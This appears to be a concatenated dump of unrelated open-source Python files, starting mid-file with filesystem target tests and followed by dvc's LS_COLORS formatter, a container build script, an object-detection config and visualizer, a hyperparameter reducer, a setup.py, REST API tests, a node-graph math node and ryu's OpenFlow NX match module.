output_pipe.foo = "custom write property"
return output_pipe
t = self.create_target(CustomFormat())
with t.open("w") as f:
assert f.foo == "custom write property"
with t.open("r") as f:
assert f.foo == "custom read property"
def test_binary_write(self):
t = self.create_target(targets.pipes.Nop)
with t.open("w") as f:
f.write(b"a\xf2\xf3\r\nfd")
with t.open("r") as f:
c = f.read()
assert c == b"a\xf2\xf3\r\nfd"
def test_writelines(self):
t = self.create_target()
with t.open("w") as f:
f.writelines(["a\n", "b\n", "c\n"])
with t.open("r") as f:
c = f.read()
assert c == "a\nb\nc\n"
def test_read_iterator(self):
t = self.create_target()
with t.open("w") as f:
f.write("a\nb\nc\n")
c = []
with t.open("r") as f:
for x in f:
c.append(x)
assert c == ["a\n", "b\n", "c\n"]
@skip_on_windows
def test_gzip(self):
t = self.create_target(io_pipe=targets.pipes.Gzip)
p = t.open("w")
test_data = b"test"
p.write(test_data)
# tp = getattr(p, "tmp_path", "")
assert not t.exists()
p.close()
# self.assertCleanUp(tp)
assert t.exists()
@skip_on_windows
def test_gzip_works_and_cleans_up(self):
t = self.create_target(targets.pipes.Gzip)
test_data = b"123testing"
with t.open("w") as f:
tp = getattr(f, "tmp_path", "")
f.write(test_data)
self.assertCleanUp(tp)
with t.open() as f:
result = f.read()
assert test_data == result
@pytest.mark.skip
def test_dataframe_csv_support(self):
t = self.create_target()
test_data = pd.DataFrame(data=[[1, 1], [2, 2]], columns=["c1", "c2"])
t.as_pandas.to_csv(test_data)
result = t.as_pandas.read_csv()
assert_frame_equal(test_data, result)
@pytest.mark.skip
def test_dataframe_parquet_support(self):
t = self.create_target()
test_data = pd.DataFrame(data=[[1, 1], [2, 2]], columns=["c1", "c2"])
t.as_pandas.to_parquet(test_data)
result = t.as_pandas.read_parquet()
assert_frame_equal(test_data, result)
def test_move_on_fs(self):
# We're cheating and retrieving the fs from target.
# TODO: maybe move to "filesystem_test.py" or something
t = self.create_target()
other_path = t.path + "-" + str(random.randint(0, 999999999))
t.touch()
fs = t.fs
assert t.exists()
fs.move(t.path, other_path)
assert not t.exists()
def test_rename_dont_move_on_fs(self):
# We're cheating and retrieving the fs from target.
# TODO: maybe move to "filesystem_test.py" or something
t = self.create_target()
other_path = t.path + "-" + str(random.randint(0, 999999999))
t.touch()
fs = t.fs
assert t.exists()
fs.rename_dont_move(t.path, other_path)
assert not t.exists()
with pytest.raises(targets.errors.FileAlreadyExists):
fs.rename_dont_move(t.path, other_path)
|
dvc/command/ls/ls_colors.py
|
indhupriya/dvc
| 9,136 |
67422
|
<gh_stars>1000+
import os
class LsColors:
default = "rs=0:di=01;34:ex=01;32"
def __init__(self, lscolors=None):
self._extensions = {}
self._codes = {}
self._load(lscolors or os.environ.get("LS_COLORS") or LsColors.default)
def _load(self, lscolors):
for item in lscolors.split(":"):
try:
code, color = item.split("=", 1)
except ValueError:
continue
if code.startswith("*."):
self._extensions[code[1:]] = color
else:
self._codes[code] = color
def format(self, entry):
text = entry["path"]
if entry.get("isout", False) and "out" in self._codes:
return self._format(text, code="out")
if entry.get("isdir", False):
return self._format(text, code="di")
if entry.get("isexec", False):
return self._format(text, code="ex")
_, ext = os.path.splitext(text)
return self._format(text, ext=ext)
def _format(self, text, code=None, ext=None):
val = None
if ext:
val = self._extensions.get(ext, None)
if code:
val = self._codes.get(code, None)
if not val:
return text
rs = self._codes.get("rs", 0)
return f"\033[{val}m{text}\033[{rs}m"
|
scripts/build_singularity_container.py
|
mens-artis/Auto-PyTorch
| 1,657 |
67447
|
import os, subprocess
if __name__ == "__main__":
move_into_container = list()
if input("Do you want to move some of your local files into to container? This will overwrite files from origin/master. (y/n) ").startswith("y"):
for f in sorted(os.listdir()):
if input("Move %s into container (y/n)? " % f).startswith("y"):
move_into_container.append(f)
if move_into_container:
subprocess.call(["tar", "-czvf", "move_into_container.tar.gz"] + move_into_container)
image_name = input("Name of Image? (Default: Auto-PyTorch.simg) ") or "Auto-PyTorch.simg"
if os.path.exists(image_name) and input("%s exists. Remove (y/n)? " % image_name).startswith("y"):
os.remove(image_name)
print("Building Singularity container. You need to be root for that.")
subprocess.call(["sudo", "singularity", "build", image_name, "scripts/Singularity"])
if move_into_container:
os.remove("move_into_container.tar.gz")
|
configs/kitti_config.py
|
wqdun/MobileNet
| 1,698 |
67454
|
from easydict import EasyDict as edict
import numpy as np
config = edict()
config.IMG_HEIGHT = 375
config.IMG_WIDTH = 1242
# TODO(shizehao): infer fea shape in run time
config.FEA_HEIGHT = 12
config.FEA_WIDTH = 39
config.EPSILON = 1e-16
config.LOSS_COEF_BBOX = 5.0
config.LOSS_COEF_CONF_POS = 75.0
config.LOSS_COEF_CONF_NEG = 100.0
config.LOSS_COEF_CLASS = 1.0
config.EXP_THRESH = 1.0
config.RBG_MEANS = np.array([[[ 123.68, 116.779, 103.939]]])
def set_anchors(H, W):
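  # Build an (H * W * B, 4) array of anchors over the H x W feature grid: each
  # row is [center_x, center_y, shape_0, shape_1], with centers spaced evenly
  # across IMG_WIDTH / IMG_HEIGHT and the same B shape priors repeated at every
  # grid cell.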
B = 9
shape = np.array(
[[ 36., 37.], [ 366., 174.], [ 115., 59.],
[ 162., 87.], [ 38., 90.], [ 258., 173.],
[ 224., 108.], [ 78., 170.], [ 72., 43.]])
# # scale
# shape[:, 0] = shape[:, 0] / config.IMG_HEIGHT
# shape[:, 1] = shape[:, 1] / config.IMG_WIDTH
anchor_shapes = np.reshape(
[shape] * H * W,
(H, W, B, 2)
)
center_x = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, W+1)*float(config.IMG_WIDTH)/(W+1)]*H*B),
(B, H, W)
),
(1, 2, 0)
),
(H, W, B, 1)
)
center_y = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, H+1)*float(config.IMG_HEIGHT)/(H+1)]*W*B),
(B, W, H)
),
(2, 1, 0)
),
(H, W, B, 1)
)
anchors = np.reshape(
np.concatenate((center_x, center_y, anchor_shapes), axis=3),
(-1, 4)
)
return anchors
config.ANCHOR_SHAPE = set_anchors(config.FEA_HEIGHT, config.FEA_WIDTH)
config.NUM_ANCHORS = 9
config.NUM_CLASSES = 3
config.ANCHORS = config.NUM_ANCHORS * config.FEA_HEIGHT * config.FEA_WIDTH
config.PLOT_PROB_THRESH = 0.4
config.NMS_THRESH = 0.4
config.PROB_THRESH = 0.005
config.TOP_N_DETECTION = 64
|
tools/visualize_results_v2.py
|
kruda/DetectAndTrack
| 1,007 |
67458
|
<reponame>kruda/DetectAndTrack
##############################################################
# Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import os.path as osp
import sys
import cPickle as pickle
import cv2
import logging
import numpy as np
from tqdm import tqdm
from core.test_engine import get_roidb_and_dataset
import utils.vis as vis_utils
import utils.image as image_utils
from core.config import (
cfg_from_file, assert_and_infer_cfg, get_output_dir, cfg_from_list)
import utils.general as gen_utils
FORMAT = '%(levelname)s %(filename)s:%(lineno)4d: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)
logger = logging.getLogger(__name__)
def _parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--cfg', dest='cfg_file', help='Config file', type=str)
parser.add_argument(
'--thresh', dest='thresh',
help='detection prob threshold',
default=0.9, type=float)
parser.add_argument(
'opts', help='See lib/core/config.py for all options', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def _id_or_index(ix, val):
if len(val) == 0:
return val
else:
return val[ix]
def _vis_single_frame(im, cls_boxes_i, cls_segms_i, cls_keyps_i, cls_tracks_i, thresh):
res = vis_utils.vis_one_image_opencv(
im, cls_boxes_i,
segms=cls_segms_i, keypoints=cls_keyps_i,
tracks=cls_tracks_i, thresh=thresh,
show_box=True, show_class=False, linewidth=3)
if res is None:
return im
return res
def _convert_roidb_to_pred_boxes(boxes):
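    # Append a confidence column of 1.0 so ground-truth boxes can be drawn
    # through the same visualization path as predicted detections.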
return np.hstack((boxes, np.ones((boxes.shape[0], 1))))
def _convert_roidb_to_pred_keyps(poses):
poses = poses.astype(np.float32)
res = []
for i in range(poses.shape[0]):
poses[i, 2, poses[i, 2, :] >= 2] += 10.0
res.append(np.vstack((poses[i], np.zeros((1, poses[i].shape[1])))))
return res
def _convert_roidb_to_pred_tracks(tracks):
return tracks.reshape((-1, )).tolist()
def _generate_visualizations(entry, ix, all_boxes, all_keyps, all_tracks, thresh):
im = image_utils.read_image_video(entry, key_frame_only=True)[0]
cls_boxes_i = [
_id_or_index(ix, all_boxes[j]) for j in range(len(all_boxes))]
if all_keyps is not None:
cls_keyps_i = [
_id_or_index(ix, all_keyps[j]) for j in range(len(all_keyps))]
else:
cls_keyps_i = None
if all_tracks is not None:
cls_tracks_i = [
_id_or_index(ix, all_tracks[j]) for j in range(len(all_tracks))]
else:
cls_tracks_i = None
pred = _vis_single_frame(
im.copy(), cls_boxes_i, None, cls_keyps_i, cls_tracks_i, thresh)
gt = _vis_single_frame(
im.copy(),
[[], _convert_roidb_to_pred_boxes(entry['boxes'])],
None,
[[], _convert_roidb_to_pred_keyps(entry['gt_keypoints'])],
[[], _convert_roidb_to_pred_tracks(entry['tracks'])],
0.1)
return gt, pred
def vis(roidb, detections_pkl, thresh, output_dir):
if len(roidb) == 0:
return
with open(detections_pkl, 'rb') as f:
dets = pickle.load(f)
all_boxes = dets['all_boxes']
if 'all_keyps' in dets:
all_keyps = dets['all_keyps']
else:
all_keyps = None
if 'all_tracks' in dets:
all_tracks = dets['all_tracks']
else:
all_tracks = None
for ix, entry in enumerate(tqdm(roidb)):
if entry['boxes'] is None or entry['boxes'].shape[0] == 0:
continue
gt, pred = _generate_visualizations(
entry, ix, all_boxes, all_keyps, all_tracks, thresh)
combined = np.hstack((gt, pred))
im_name = entry['image']
if isinstance(im_name, list):
im_name = im_name[len(im_name) // 2]
out_name = im_name[len(dataset.image_directory):]
out_path = osp.join(output_dir, out_name)
gen_utils.mkdir_p(osp.dirname(out_path))
cv2.imwrite(out_path, combined)
if __name__ == '__main__':
args = _parse_args()
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.opts is not None:
cfg_from_list(args.opts)
assert_and_infer_cfg()
test_output_dir = get_output_dir(training=False)
det_file = osp.join(test_output_dir, 'detections.pkl')
tracking_det_file = osp.join(test_output_dir, 'detections_withTracks.pkl')
if osp.exists(tracking_det_file):
det_file = tracking_det_file
output_dir = osp.join(test_output_dir, 'vis/')
if not osp.exists(det_file):
raise ValueError('Output file not found {}'.format(det_file))
else:
logger.info('Visualizing {}'.format(det_file))
    # Set include_gt True when using the roidb to evaluate directly. Not doing
    # that currently.
roidb, dataset, _, _, _ = get_roidb_and_dataset(None, include_gt=True)
vis(roidb, det_file, args.thresh, output_dir)
|
talos/reducers/forrest.py
|
zazula/talos
| 1,536 |
67472
|
def forrest(self):
    '''Random Forest based reduction strategy. Somewhat more
    aggressive than, for example, 'spearman' because there are no
    negative values: instead, the highest positive correlation is
    subtracted from all the values so that the maximum becomes 0, and
    the values are then made positive. The label with the highest
    positive score at the end is dropped. This means that anything
    that was originally 0 is a candidate for dropping. Because there
    are often multiple zeroes, there is an element of randomness in
    which one is dropped.
    '''
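    # Illustrative walk-through with hypothetical numbers, assuming the
    # correlations come back sorted in descending order (index 0 = maximum):
    #   raw scores:          [0.9, 0.4, 0.0]
    #   minus the maximum:   [0.0, -0.5, -0.9]
    #   absolute values:     [0.0, 0.5, 0.9]
    # The last (largest) entry, which started at 0.0, is the one dropped below.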
import wrangle
import numpy as np
# handle conversion to multi_labels
from .reduce_utils import cols_to_multilabel
data = cols_to_multilabel(self)
# get the correlations
corr_values = wrangle.df_corr_randomforest(data, self.reduction_metric)
# drop labels where value is NaN
corr_values.dropna(inplace=True)
# handle the turning around of values (see docstring for more info)
corr_values -= corr_values[0]
corr_values = corr_values.abs()
# get the strongest correlation
corr_values = corr_values.index[-1]
# get the label, value, and dtype from the column header
label, dtype, value = corr_values.split('~')
# convert things back to their original dtype
value = np.array([value]).astype(dtype)[0]
# this is where we modify the parameter space accordingly
self.param_object.remove_is(label, value)
return self
|
python/setup.py
|
wangmiao1981/sparkMeasure
| 453 |
67485
|
<filename>python/setup.py<gh_stars>100-1000
#!/usr/bin/env python
from setuptools import setup, find_packages
description = 'Python API for sparkMeasure, a tool for performance troubleshooting of Apache Spark workloads'
long_description = """SparkMeasure is a tool for performance troubleshooting of Apache Spark workloads.
It simplifies the collection and analysis of Spark performance metrics. The bulk of sparkMeasure is written in Scala.
This package contains the Python API for sparkMeasure and is intended to work in conjunction with PySpark.
Use from python command line or in Jupyter notebook environments, or as a tool to instrument Python code running Spark workloads.
**[Link to sparkMeasure GitHub page and documentation](https://github.com/lucacanali/sparkMeasure)**"""
setup(name='sparkmeasure',
version='0.14.0',
description=description,
long_description=long_description,
long_description_content_type="text/markdown",
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/lucacanali/sparkMeasure',
license='Apache License, Version 2.0',
include_package_data=True,
packages=find_packages(),
zip_safe=False,
python_requires='>=2.7',
install_requires=[],
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Operating System :: OS Independent',
'License :: OSI Approved :: Apache Software License',
'Intended Audience :: Developers',
'Development Status :: 4 - Beta',
]
)
|
web/test/test.py
|
thekad/clusto
| 216 |
67497
|
<filename>web/test/test.py<gh_stars>100-1000
from rest import request
from pprint import pprint
from traceback import format_exc
try: import json
except ImportError: import simplejson as json
BASE_URL = 'http://localhost:9999'
def test_default_delegate():
status, headers, data = request('GET', BASE_URL + '/')
assert status == 200
assert type(json.loads(data)) == list
return True
def test_types_delegate():
status, headers, data = request('GET', BASE_URL + '/server')
assert status == 200
data = json.loads(data)
assert type(data) == list
if len(data) > 0:
assert type(data[0]) == str
return True
def test_action_delegate():
testname = '/pool/api_test_pool'
test_create(testname)
test_create('/pool/api_test_child')
test_action_addattr(testname)
test_action_delattr(testname)
test_action_insert(testname)
test_action_remove(testname)
test_action_show(testname)
test_delete('/pool/api_test_child')
test_delete(testname)
def test_create(testname):
status, headers, data = request('POST', BASE_URL + testname)
assert status == 201
data = json.loads(data)
assert 'object' in data
assert data['object'] == testname
return True
def test_action_addattr(testname):
status, headers, data = request('GET', BASE_URL + testname + '/addattr?key=testkey&value=testvalue')
assert status == 200
data = json.loads(data)
assert type(data) == dict
assert data['attrs'] == [{'key': 'testkey', 'value': 'testvalue', 'subkey': None, 'number': None, 'datatype': 'string'}]
return True
def test_action_delattr(testname):
status, headers, data = request('GET', BASE_URL + testname + '/delattr?key=testkey')
assert status == 200
data = json.loads(data)
assert len(data['attrs']) == 0
return True
def test_action_insert(testname):
status, headers, data = request('GET', BASE_URL + testname + '/insert?object=/pool/api_test_child')
assert status == 200
data = json.loads(data)
assert data['contents'] == ['/pool/api_test_child']
return True
def test_action_remove(testname):
status, headers, data = request('GET', BASE_URL + testname + '/remove?object=/pool/api_test_child')
assert status == 200
data = json.loads(data)
assert data['contents'] == []
return True
def test_action_show(testname):
status, headers, data = request('GET', BASE_URL + testname + '/show')
assert status == 200
data = json.loads(data)
for field in ('object', 'attrs', 'contents', 'parents', 'actions'):
assert field in data.keys()
return True
def test_delete(testname):
status, headers, data = request('DELETE', BASE_URL + testname)
assert status in (200, 202, 204)
return True
if __name__ == '__main__':
test_default_delegate()
test_types_delegate()
test_action_delegate()
|
example_nodes/math_node.py
|
996268132/NodeGraphQt
| 582 |
67506
|
<filename>example_nodes/math_node.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import example_nodes.wrappers.math as math
import inspect
from functools import partial
from NodeGraphQt import BaseNode
class MathFunctionsNode(BaseNode):
"""
Math functions node.
"""
# set a unique node identifier.
__identifier__ = 'Math'
# set the initial default node name.
NODE_NAME = 'Math Functions'
mathFuncs = [func for func in dir(math) if not func.startswith('_')]
def __init__(self):
super(MathFunctionsNode, self).__init__()
self.set_color(25, 58, 51)
self.add_combo_menu('funcs', 'Functions', items=self.mathFuncs,
tab='widgets')
# switch math function type
self.view.widgets['funcs'].value_changed.connect(self.addFunction)
self.view.widgets['funcs'].value_changed.connect(self.update_stream)
self.add_output('output')
self.create_property('output', None)
self.trigger_type = 'no_inPorts'
self.view.widgets['funcs'].get_custom_widget().setCurrentIndex(2)
def addFunction(self, prop, func):
"""
Create inputs based on math functions arguments.
"""
self.func = getattr(math, func)
dataFunc = inspect.getfullargspec(self.func)
for arg in dataFunc.args:
if not self.has_property(arg):
inPort = self.add_input(arg)
inPort.trigger = True
self.create_property(arg, None)
for inPort in self._inputs:
if inPort.name() in dataFunc.args:
if not inPort.visible():
inPort.set_visible(True)
else:
inPort.set_visible(False)
def run(self):
"""
Evaluate all entries, pass them as arguments of the
chosen mathematical function.
"""
for to_port in self.input_ports():
if to_port.visible() == False:
continue
from_ports = to_port.connected_ports()
if not from_ports:
raise Exception('Port %s not connected!' % to_port.name(),
to_port)
for from_port in from_ports:
from_port.node().run()
data = from_port.node().get_property(from_port.name())
self.set_property(to_port.name(), float(data))
try:
# Execute math function with arguments.
data = self.func(*[self.get_property(inport.name()) for inport in self._inputs if inport.visible()])
self.set_property('output', data)
except KeyError as error:
print("An input is missing! %s" % str(error))
except TypeError as error:
print("Error evaluating function: %s" % str(error))
def on_input_connected(self, to_port, from_port):
"""Override node callback method."""
self.set_property(to_port.name(), from_port.node().run())
self.update_stream()
def on_input_disconnected(self, to_port, from_port):
"""Override node callback method."""
self.set_property('output', None)
self.update_stream()
|
ryu/ofproto/nx_match.py
|
hiArvin/ryu
| 269 |
67507
|
# Copyright (C) 2011, 2012 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2011, 2012 <NAME> <yamahata at valinux co jp>
# Copyright (C) 2012 <NAME> <horms ad verge net au>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import itertools
from ryu import exception
from ryu.lib import mac
from . import ofproto_parser
from . import ofproto_v1_0
from . import inet
import logging
LOG = logging.getLogger('ryu.ofproto.nx_match')
UINT64_MAX = (1 << 64) - 1
UINT32_MAX = (1 << 32) - 1
UINT16_MAX = (1 << 16) - 1
FWW_IN_PORT = 1 << 0
FWW_DL_TYPE = 1 << 4
FWW_NW_PROTO = 1 << 5
# No corresponding OFPFW_* bits
FWW_NW_DSCP = 1 << 1
FWW_NW_ECN = 1 << 2
FWW_ARP_SHA = 1 << 3
FWW_ARP_THA = 1 << 6
FWW_IPV6_LABEL = 1 << 7
FWW_NW_TTL = 1 << 8
FWW_ALL = (1 << 13) - 1
FLOW_NW_FRAG_ANY = 1 << 0
FLOW_NW_FRAG_LATER = 1 << 1
FLOW_NW_FRAG_MASK = FLOW_NW_FRAG_ANY | FLOW_NW_FRAG_LATER
IP_ECN_MASK = 0x03
IP_DSCP_MASK = 0xfc
MF_PACK_STRING_BE64 = '!Q'
MF_PACK_STRING_BE32 = '!I'
MF_PACK_STRING_BE16 = '!H'
MF_PACK_STRING_8 = '!B'
MF_PACK_STRING_MAC = '!6s'
MF_PACK_STRING_IPV6 = '!8H'
_MF_FIELDS = {}
FLOW_N_REGS = 8 # ovs 1.5
class Flow(object):
def __init__(self):
self.in_port = 0
self.dl_vlan = 0
self.dl_vlan_pcp = 0
self.dl_src = mac.DONTCARE
self.dl_dst = mac.DONTCARE
self.dl_type = 0
self.tp_dst = 0
self.tp_src = 0
self.nw_tos = 0
self.vlan_tci = 0
self.nw_ttl = 0
self.nw_proto = 0
self.arp_sha = 0
self.arp_tha = 0
self.nw_src = 0
self.nw_dst = 0
self.tun_id = 0
self.arp_spa = 0
self.arp_tpa = 0
self.ipv6_src = []
self.ipv6_dst = []
self.nd_target = []
self.nw_frag = 0
self.regs = [0] * FLOW_N_REGS
self.ipv6_label = 0
class FlowWildcards(object):
def __init__(self):
self.dl_src_mask = 0
self.dl_dst_mask = 0
self.tp_src_mask = 0
self.tp_dst_mask = 0
self.nw_src_mask = 0
self.nw_dst_mask = 0
self.tun_id_mask = 0
self.arp_spa_mask = 0
self.arp_tpa_mask = 0
self.vlan_tci_mask = 0
self.ipv6_src_mask = []
self.ipv6_dst_mask = []
self.nd_target_mask = []
self.nw_frag_mask = 0
self.regs_bits = 0
self.regs_mask = [0] * FLOW_N_REGS
self.wildcards = ofproto_v1_0.OFPFW_ALL
class ClsRule(object):
"""describe a matching rule for OF 1.0 OFPMatch (and NX).
"""
def __init__(self):
self.wc = FlowWildcards()
self.flow = Flow()
def set_in_port(self, port):
self.wc.wildcards &= ~FWW_IN_PORT
self.flow.in_port = port
def set_dl_vlan(self, dl_vlan):
self.wc.wildcards &= ~ofproto_v1_0.OFPFW_DL_VLAN
self.flow.dl_vlan = dl_vlan
def set_dl_vlan_pcp(self, dl_vlan_pcp):
self.wc.wildcards &= ~ofproto_v1_0.OFPFW_DL_VLAN_PCP
self.flow.dl_vlan_pcp = dl_vlan_pcp
def set_dl_dst(self, dl_dst):
self.flow.dl_dst = dl_dst
def set_dl_dst_masked(self, dl_dst, mask):
self.wc.dl_dst_mask = mask
# bit-wise and of the corresponding elements of dl_dst and mask
self.flow.dl_dst = mac.haddr_bitand(dl_dst, mask)
def set_dl_src(self, dl_src):
self.flow.dl_src = dl_src
def set_dl_src_masked(self, dl_src, mask):
self.wc.dl_src_mask = mask
self.flow.dl_src = mac.haddr_bitand(dl_src, mask)
def set_dl_type(self, dl_type):
self.wc.wildcards &= ~FWW_DL_TYPE
self.flow.dl_type = dl_type
def set_dl_tci(self, tci):
self.set_dl_tci_masked(tci, UINT16_MAX)
def set_dl_tci_masked(self, tci, mask):
self.wc.vlan_tci_mask = mask
self.flow.vlan_tci = tci
def set_tp_src(self, tp_src):
self.set_tp_src_masked(tp_src, UINT16_MAX)
def set_tp_src_masked(self, tp_src, mask):
self.wc.tp_src_mask = mask
self.flow.tp_src = tp_src & mask
def set_tp_dst(self, tp_dst):
self.set_tp_dst_masked(tp_dst, UINT16_MAX)
def set_tp_dst_masked(self, tp_dst, mask):
self.wc.tp_dst_mask = mask
self.flow.tp_dst = tp_dst & mask
def set_nw_proto(self, nw_proto):
self.wc.wildcards &= ~FWW_NW_PROTO
self.flow.nw_proto = nw_proto
def set_nw_src(self, nw_src):
self.set_nw_src_masked(nw_src, UINT32_MAX)
def set_nw_src_masked(self, nw_src, mask):
self.flow.nw_src = nw_src
self.wc.nw_src_mask = mask
def set_nw_dst(self, nw_dst):
self.set_nw_dst_masked(nw_dst, UINT32_MAX)
def set_nw_dst_masked(self, nw_dst, mask):
self.flow.nw_dst = nw_dst
self.wc.nw_dst_mask = mask
def set_nw_dscp(self, nw_dscp):
self.wc.wildcards &= ~FWW_NW_DSCP
self.flow.nw_tos &= ~IP_DSCP_MASK
self.flow.nw_tos |= nw_dscp & IP_DSCP_MASK
def set_icmp_type(self, icmp_type):
self.set_tp_src(icmp_type)
def set_icmp_code(self, icmp_code):
self.set_tp_dst(icmp_code)
def set_tun_id(self, tun_id):
self.set_tun_id_masked(tun_id, UINT64_MAX)
def set_tun_id_masked(self, tun_id, mask):
self.wc.tun_id_mask = mask
self.flow.tun_id = tun_id & mask
def set_nw_ecn(self, nw_ecn):
self.wc.wildcards &= ~FWW_NW_ECN
self.flow.nw_tos &= ~IP_ECN_MASK
self.flow.nw_tos |= nw_ecn & IP_ECN_MASK
def set_nw_ttl(self, nw_ttl):
self.wc.wildcards &= ~FWW_NW_TTL
self.flow.nw_ttl = nw_ttl
def set_nw_frag(self, nw_frag):
self.wc.nw_frag_mask |= FLOW_NW_FRAG_MASK
self.flow.nw_frag = nw_frag
def set_nw_frag_masked(self, nw_frag, mask):
self.wc.nw_frag_mask = mask
self.flow.nw_frag = nw_frag & mask
def set_arp_spa(self, spa):
self.set_arp_spa_masked(spa, UINT32_MAX)
def set_arp_spa_masked(self, spa, mask):
self.flow.arp_spa = spa
self.wc.arp_spa_mask = mask
def set_arp_tpa(self, tpa):
self.set_arp_tpa_masked(tpa, UINT32_MAX)
def set_arp_tpa_masked(self, tpa, mask):
self.flow.arp_tpa = tpa
self.wc.arp_tpa_mask = mask
def set_arp_sha(self, sha):
self.wc.wildcards &= ~FWW_ARP_SHA
self.flow.arp_sha = sha
def set_arp_tha(self, tha):
self.wc.wildcards &= ~FWW_ARP_THA
self.flow.arp_tha = tha
def set_icmpv6_type(self, icmp_type):
self.set_tp_src(icmp_type)
def set_icmpv6_code(self, icmp_code):
self.set_tp_dst(icmp_code)
def set_ipv6_label(self, label):
self.wc.wildcards &= ~FWW_IPV6_LABEL
self.flow.ipv6_label = label
def set_ipv6_src_masked(self, src, mask):
self.wc.ipv6_src_mask = mask
self.flow.ipv6_src = [x & y for (x, y) in itertools.izip(src, mask)]
def set_ipv6_src(self, src):
self.flow.ipv6_src = src
def set_ipv6_dst_masked(self, dst, mask):
self.wc.ipv6_dst_mask = mask
self.flow.ipv6_dst = [x & y for (x, y) in itertools.izip(dst, mask)]
def set_ipv6_dst(self, dst):
self.flow.ipv6_dst = dst
def set_nd_target_masked(self, target, mask):
self.wc.nd_target_mask = mask
self.flow.nd_target = [x & y for (x, y) in
itertools.izip(target, mask)]
def set_nd_target(self, target):
self.flow.nd_target = target
def set_reg(self, reg_idx, value):
self.set_reg_masked(reg_idx, value, 0)
def set_reg_masked(self, reg_idx, value, mask):
self.wc.regs_mask[reg_idx] = mask
self.flow.regs[reg_idx] = value
self.wc.regs_bits |= (1 << reg_idx)
def flow_format(self):
# Tunnel ID is only supported by NXM
if self.wc.tun_id_mask != 0:
return ofproto_v1_0.NXFF_NXM
# Masking DL_DST is only supported by NXM
if self.wc.dl_dst_mask:
return ofproto_v1_0.NXFF_NXM
# Masking DL_SRC is only supported by NXM
if self.wc.dl_src_mask:
return ofproto_v1_0.NXFF_NXM
# ECN is only supported by NXM
if not self.wc.wildcards & FWW_NW_ECN:
return ofproto_v1_0.NXFF_NXM
return ofproto_v1_0.NXFF_OPENFLOW10
def match_tuple(self):
"""return a tuple which can be used as *args for
ofproto_v1_0_parser.OFPMatch.__init__().
see Datapath.send_flow_mod.
"""
assert self.flow_format() == ofproto_v1_0.NXFF_OPENFLOW10
wildcards = ofproto_v1_0.OFPFW_ALL
if not self.wc.wildcards & FWW_IN_PORT:
wildcards &= ~ofproto_v1_0.OFPFW_IN_PORT
if self.flow.dl_src != mac.DONTCARE:
wildcards &= ~ofproto_v1_0.OFPFW_DL_SRC
if self.flow.dl_dst != mac.DONTCARE:
wildcards &= ~ofproto_v1_0.OFPFW_DL_DST
if not self.wc.wildcards & FWW_DL_TYPE:
wildcards &= ~ofproto_v1_0.OFPFW_DL_TYPE
if self.flow.dl_vlan != 0:
wildcards &= ~ofproto_v1_0.OFPFW_DL_VLAN
if self.flow.dl_vlan_pcp != 0:
wildcards &= ~ofproto_v1_0.OFPFW_DL_VLAN_PCP
if self.flow.nw_tos != 0:
wildcards &= ~ofproto_v1_0.OFPFW_NW_TOS
if self.flow.nw_proto != 0:
wildcards &= ~ofproto_v1_0.OFPFW_NW_PROTO
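        # OpenFlow 1.0 encodes IP masks in the wildcard field as a count of
        # ignored low-order bits: '"01" not in bin(mask)' checks that the mask
        # is contiguous, and 'count("0") - 1' counts its zero bits (minus the
        # '0' of the '0b' prefix), e.g. 0xffffff00 (a /24) yields 8.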
if self.wc.nw_src_mask != 0 and "01" not in bin(self.wc.nw_src_mask):
wildcards &= ~ofproto_v1_0.OFPFW_NW_SRC_MASK
maskbits = (bin(self.wc.nw_src_mask).count("0") - 1)
wildcards |= (maskbits << ofproto_v1_0.OFPFW_NW_SRC_SHIFT)
if self.wc.nw_dst_mask != 0 and "01" not in bin(self.wc.nw_dst_mask):
wildcards &= ~ofproto_v1_0.OFPFW_NW_DST_MASK
maskbits = (bin(self.wc.nw_dst_mask).count("0") - 1)
wildcards |= (maskbits << ofproto_v1_0.OFPFW_NW_DST_SHIFT)
if self.flow.tp_src != 0:
wildcards &= ~ofproto_v1_0.OFPFW_TP_SRC
if self.flow.tp_dst != 0:
wildcards &= ~ofproto_v1_0.OFPFW_TP_DST
return (wildcards, self.flow.in_port, self.flow.dl_src,
self.flow.dl_dst, self.flow.dl_vlan, self.flow.dl_vlan_pcp,
self.flow.dl_type, self.flow.nw_tos & IP_DSCP_MASK,
self.flow.nw_proto, self.flow.nw_src, self.flow.nw_dst,
self.flow.tp_src, self.flow.tp_dst)
def _set_nxm_headers(nxm_headers):
'''Annotate corresponding NXM header'''
def _set_nxm_headers_dec(self):
self.nxm_headers = nxm_headers
return self
return _set_nxm_headers_dec
def _register_make(cls):
'''class decorator to Register mf make'''
assert cls.nxm_headers is not None
    assert cls.nxm_headers != []
for nxm_header in cls.nxm_headers:
assert nxm_header not in _MF_FIELDS
_MF_FIELDS[nxm_header] = cls.make
return cls
def mf_from_nxm_header(nxm_header):
if nxm_header not in _MF_FIELDS:
return None
make = _MF_FIELDS.get(nxm_header)
assert make is not None
return make(nxm_header)
class MFField(object):
_FIELDS_HEADERS = {}
@staticmethod
def register_field_header(headers):
def _register_field_header(cls):
for header in headers:
MFField._FIELDS_HEADERS[header] = cls
return cls
return _register_field_header
def __init__(self, nxm_header, pack_str):
self.nxm_header = nxm_header
self.pack_str = pack_str
self.n_bytes = struct.calcsize(pack_str)
